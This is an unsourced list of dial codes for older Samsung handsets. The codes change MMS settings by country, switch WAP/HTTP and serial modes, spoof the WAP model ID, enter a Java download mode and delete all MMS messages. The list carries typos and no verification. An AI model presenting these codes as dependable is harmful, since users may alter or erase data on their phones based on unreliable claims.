*2767*34667# = Spain MMS Settings
*2767*46667# = Sweden MMS Settings
*2767*380667# = Ukraine MMS Settings
*2767*7667#. = Russia MMS Settings
*2767*30667# = GREECE MMS Settings
*335# = Delete all MMS Messages
*663867# = Dump Mm file
#*536961# = WAPSAR enable / HTTP disable
#*536962# = WAPSAR disable / HTTP enable
#*536963# = Serial eable / Others disable
#*53696# = Java Download Mode
#*5663351# = WAP Model ID [Your Model]
#*5663352# = WAP Model ID [SEC-SGHXXXX/1.0]
#*566335# = WAP Model ID [SEC-SGHXXXX/1.0]
*2767*66335# = Check on which model it is
*2767*7100# = SEC-SGHS100/1.0
*2767*8200# = SEC-SGHV200/1.0
*2767*7300# = SEC-SGHS300/1.0
*2767*7650# = Nokia7650/1.0
*2767*2877368# = Reset WAP Model ID to standart